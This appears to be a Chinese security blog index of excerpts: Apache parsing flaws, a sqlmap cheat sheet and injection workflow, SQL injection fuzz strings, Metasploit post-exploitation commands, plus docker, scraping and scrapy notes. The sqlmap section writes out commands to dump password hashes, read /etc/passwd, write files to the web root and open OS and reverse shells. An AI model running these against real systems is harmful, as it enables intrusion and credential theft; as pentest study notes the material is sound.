0%

服务器解析漏洞

服务器解析漏洞一般是服务器自身或扩展组件带来的漏洞,配合文件上传等漏洞就会产生很大的危害。
我们这里整理常见的服务器apache、IIS、nginx的解析漏洞。

apache

  • 一、不可识别解析

apache解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。
比如 test.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php。
apache版本在以下范围内
Apache 2.0.x <= 2.0.59 Apache 2.2.x <= 2.2.17 Apache 2.2.2 <= 2.2.8 都可以通过上传xxx.php.rar或xxx.php+任意无法解析后缀解析为php。

阅读全文 »

参数

  • -u #注入点
  • -f #指纹判别数据库类型
  • -b #获取数据库版本信息
  • -p #指定可测试的参数(?page=1&id=2 -p “page,id”)
  • -D “” #指定数据库名
  • -T “” #指定表名
  • -C “” #指定字段
  • -s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log”  恢复:-s “xx.log” –resume)
  • –level=(1-5) #要执行的测试水平等级,默认为1
  • –risk=(0-3) #测试执行的风险等级,默认为1
  • –time-sec=(2,5) #延迟响应,默认为5
  • –data #通过POST发送数据
  • –columns #列出字段
  • –current-user #获取当前用户名称
  • –current-db #获取当前数据库名称
  • –users #列数据库所有用户
  • –passwords #数据库用户所有密码
  • –privileges #查看用户权限(–privileges -U root)
  • -U #指定数据库用户
  • –dbs #列出所有数据库
  • –tables -D “” #列出指定数据库中的表
  • –columns -T “user” -D “mysql”#列出mysql数据库中的user表的所有字段
  • –dump-all #列出所有数据库所有表
  • –exclude-sysdbs #只列出用户自己新建的数据库和表
  • –dump -T “” -D “” -C “” #列出指定数据库的表的字段的数据(–dump -T users -D master -C surname)
  • –dump -T “” -D “” –start 2 –top 4 # 列出指定数据库的表的2-4字段的数据
  • –dbms #指定数据库(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)
  • –os #指定系统(Linux,Windows)
  • -v #详细的等级(0-6) 0:只显示Python的回溯,错误和关键消息。
    1.显示信息和警告消息。
    2:显示调试消息。
    3:有效载荷注入。
    4:显示HTTP请求。
    5:显示HTTP响应头。
    6:显示HTTP响应页面的内容
  • –privileges #查看权限
  • –is-dba #是否是数据库管理员
  • –roles #枚举数据库用户角色
  • –udf-inject #导入用户自定义函数(获取系统权限)
  • –union-check #是否支持union 注入
  • –union-cols #union 查询表记录
  • –union-test #union 语句测试
  • –union-use #采用union 注入
  • –union-tech orderby #union配合order by
  • –data “” #POST方式提交数据(–data “page=1&id=2”)
  • –cookie “用;号分开” #cookie注入(–cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”) –referer “” #使用referer欺骗(–referer “http://“)
  • –user-agent “” #自定义user-agent
  • –random-agent #随机ua
  • – tamper #使用防过滤脚本
  • –proxy “http://127.0.0.1:8118" #代理注入
  • –string=”” #指定关键词,字符串匹配.
  • –threads    #采用多线程(–threads 3)
  • –sql-shell #执行指定sql命令
  • –sql-query #执行指定的sql语句(–sql-query “SELECT password FROM mysql.user WHERE user = ‘root’ LIMIT 0, 1” )
  • –file-read #读取指定文件
  • –file-write #写入本地文件(–file-write /test/test.txt –file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)
  • –file-dest #要写入的文件绝对路径
  • –os-cmd=id #执行系统命令
  • –os-shell #系统交互shell
  • –os-pwn #反弹shell(–os-pwn –msf-path=/opt/framework/msf3/)
  • –msf-path= #matesploit绝对路径(–msf-path=/opt/framework/msf3/)
  • –os-smbrelay #
  • –os-bof #
  • –reg-read #读取win系统注册表
  • –priv-esc #
  • –time-sec= #延迟设置 默认–time-sec=5 为5秒 -p “user-agent” –user-agent “sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" #指定user-agent注入
  • –eta #盲注 /pentest/database/sqlmap/txt/common-columns.txt  字段字典   
    common-outputs.txt
    common-tables.txt 表字典
    keywords.txt
    oracle-default-passwords.txt
    user-agents.txt
    wordlist.txt

    常用语句

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    1. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db --users --passwords --dbs -v 0

    2. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --passwords -U root --union-use -v 2

    3. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --dump -T users -C username -D userdb --start 2 --stop 3 -v 2

    4. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --dump -C "user,pass" -v 1 --exclude-sysdbs

    5. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --sql-shell -v 2

    6. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --file-read "c:\boot.ini" -v 2

    7. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --file-write /test/test.txt --file-dest /var/www/html/1.txt -v 2

    8. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-cmd "id" -v 1

    9. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-shell --union-use -v 2

    10. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 --priv-esc -v 1

    11. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 -v 1

    12. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-bof --msf-path=/opt/framework/msf3 -v 1

    13. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --reg-add --reg-key="HKEY_LOCAL_NACHINE\SOFEWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

    14. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --eta

    15. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -p id --prefix "')" --suffix "AND ('abc'='abc"

    16. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --auth-type Basic --auth-cred "testuser:testpass"

    17. /sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"

    18. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

    19. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --sql-query "SELECT 'foo'" -v 1

    20. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --common-tables -D testdb --banner

    21. /sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --cookie="PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low" --string='xx' --dbs --level=3 -p "uid"

注入流程

  1. 读取数据库版本,当前用户,当前数据库

    1
    sqlmap -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db -v 1 
  2. 判断当前数据库用户权限

    1
    2
    sqlmap -u http://www.xxxxx.com/test.php?p=2 --privileges -U 用户名 -v 1 
    sqlmap -u http://www.xxxxx.com/test.php?p=2 --is-dba -U 用户名 -v 1
  3. 读取所有数据库用户或指定数据库用户的密码

    1
    2
    sqlmap -u http://www.xxxxx.com/test.php?p=2 --users --passwords -v 2 
    sqlmap -u http://www.xxxxx.com/test.php?p=2 --passwords -U root -v 2
  4. 获取所有数据库

    1
    sqlmap -u http://www.xxxxx.com/test.php?p=2 --dbs -v 2 
  5. 获取指定数据库中的所有表

    1
    sqlmap -u http://www.xxxxx.com/test.php?p=2 --tables -D mysql -v 2
  6. 获取指定数据库名中指定表的字段

    1
    sqlmap -u http://www.xxxxx.com/test.php?p=2 --columns -D mysql -T users -v 2
  7. 获取指定数据库名中指定表中指定字段的数据

    1
    sqlmap -u http://www.xxxxx.com/test.php?p=2 --dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log" -v 2 
  8. file-read读取web文件

    1
    sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-read "/etc/passwd" -v 2
  9. file-write写入文件到web

    1
    sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-write /localhost/mm.php --file #使用sqlmap绕过防火墙进行注入测试

sql注入

SQL注入是一种代码注入技术,用于攻击数据驱动的应用程序。 在应用程序中,如果没有做恰当的过滤,则可能使得恶意的SQL语句被插入输入字段中执行(例如将数据库内容转储给攻击者)

常见的注入点

  • GET/POST/PUT/DELETE参数
  • X-Forwarded-For
  • 文件名
  • 4.1.2.2. Fuzz注入点
  • ‘ / “
  • 1/1
  • 1/0
  • and 1=1
  • “ and “1”=”1
  • and 1=2
  • or 1=1
  • or 1=
  • ‘ and ‘1’=’1
  • + - ^ * % /
  • << >> || | & &&
  • ~
  • !
  • @
  • 反引号执行

4.1.2.3. 测试用常量

阅读全文 »

大数据概述&解决办法

大数据的特征(5v+1c)

  • 大量:数据量巨大,MB,GB,TB,PB
  • 多样:数据类型多样,数据来源多样 数据来源:服务器日志、网站浏览信息、社交
    结构化数据:表格数据 平台、摄像头信息
    半结构化数据:网页html、xml
    非结构化数据:视频、音频、图片、文字
  • 高速:数据产生速度快、数据处理速度快
  • 价值:价值密度低
  • 准确:数据真实性
  • 复杂:数据产生速度快、数据的类型多样等特征,导致做数据处理时处理过程变得很复杂

大数据处理流程

数据采集->数据预处理->数据存储->分析挖掘->数据可视化

阅读全文 »

msf后渗透命令整理

  • 后渗透基本知识
  • 权限维持,权限提升,内网渗透等
  • 内网渗透:信息收集,读取用户hash,浏览器密码等
  • 域渗透:获取域控权限

1.后渗透基本操作

1
2
3
4
5
background		    让meterpreter处于后台
sessions -i 会话号 与会话进行交互
quit 退出会话
shell 获取一个交互式shell
irb 开启ruby终端

2.文件操作命令

阅读全文 »

docker帮助命令

1
2
3
docker version 显示版本信息
docker help 帮助
docker info 基本信息

docker镜像命令

1
2
3
4
docker images
# 可选项
-a, --all # 列出所有镜像
-q, --quite # 只显示镜像的id

docker search 搜索镜像

阅读全文 »

信息收集流程框架

web安全的本质是信息收集,信息收集的广度决定了渗透测试的深度

google hacking

利用谷歌强大的搜索引擎,经常会有意想不到的的收获

阅读全文 »

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: 协程4-实战爬取tuao8.com
Author : chenci
date: 2022/3/25
-------------------------------------------------
"""
import aiofiles
import requests
from lxml import etree
import asyncio
import aiohttp
from fake_useragent import UserAgent
import os
import time

def create_dir_not_exist(path):
if not os.path.exists(path):
os.makedirs(path)


# 抓取每个条目的图集
def get_photos_url():
resp = requests.get(url='https://www.tuao8.xyz/category-2_1.html', headers=header)
text = etree.HTML(resp.text)
href_url_list = text.xpath('//*[@id="container"]/main/article/div/a/@href')
return href_url_list


# 去请求每个图集.返回源码
async def get_photos(photo_list):
# 限制并发熟路默认100,0为无限制
conn = aiohttp.TCPConnector(limit=10)
# 发送请求
async with aiohttp.ClientSession(connector=conn) as session:
async with await session.get(url=photo_list, headers=header) as resp:
page_text = await resp.text()
await get_photos_title_page(page_text, photo_list)


# 从每个源码里筛选出标题和最大页码,url
async def get_photos_title_page(text, url):
tasks = []
html = etree.HTML(text)
title = html.xpath('//*[@id="container"]/main/article/h1/text()')[0]
max_page = int(html.xpath('//*[@id="dm-fy"]/li[last()-1]/a/text()')[0])
create_dir_not_exist(f'./imgs/tuzo_xc/{title}')
task = asyncio.create_task(get_download_url(url=url, title=title, max_page=max_page))
tasks.append(task)
await asyncio.wait(tasks)


# 获取每一页的url并从源码中筛选出每张图片的下载链接
async def get_download_url(url, title, max_page):
tasks = []
for i in range(1, max_page):
urls = f'{url}?page={i}'
conn = aiohttp.TCPConnector(limit=10)
async with aiohttp.ClientSession(connector=conn) as session:
async with await session.get(url=urls, headers=header) as resp:
page_text = await resp.text()
html = etree.HTML(page_text)
image_url = html.xpath('//*[@class="entry"]//img/@src')[0]
task = asyncio.create_task(download_image(image_url, title, i))
tasks.append(task)
await asyncio.wait(tasks)


# 下载
async def download_image(image_url, title, i):
conn = aiohttp.TCPConnector(limit=30)
async with aiohttp.ClientSession(connector=conn) as session:
try:
async with await session.get(url=image_url, headers=header) as resp:
print(image_url)
async with aiofiles.open(f'./imgs/{title}/{i}.jpg', 'wb') as f:
print(f'正在下载{title}{i}张')
await f.write(await resp.read())
except:
pass
print('下载完成')


async def main():
href_url_list = get_photos_url()
tasks = []
for url in href_url_list:
task = asyncio.create_task(get_photos(photo_list=url))
tasks.append(task)
await asyncio.wait(tasks)


if __name__ == '__main__':
start = time.time()
ua = UserAgent()
header = {
'Referer': 'https://www.tuao8.xyz/category-2_2.html',
'user-agent': ua.random
}
asyncio.run(main())
end = time.time()
print('全部下载完成!耗时:', int(end - start), '秒')


创建项目

1
scrapy startproject tutorial

创建任务

1
scrapy genspider first www.baidu.com

会生成一个first文件

阅读全文 »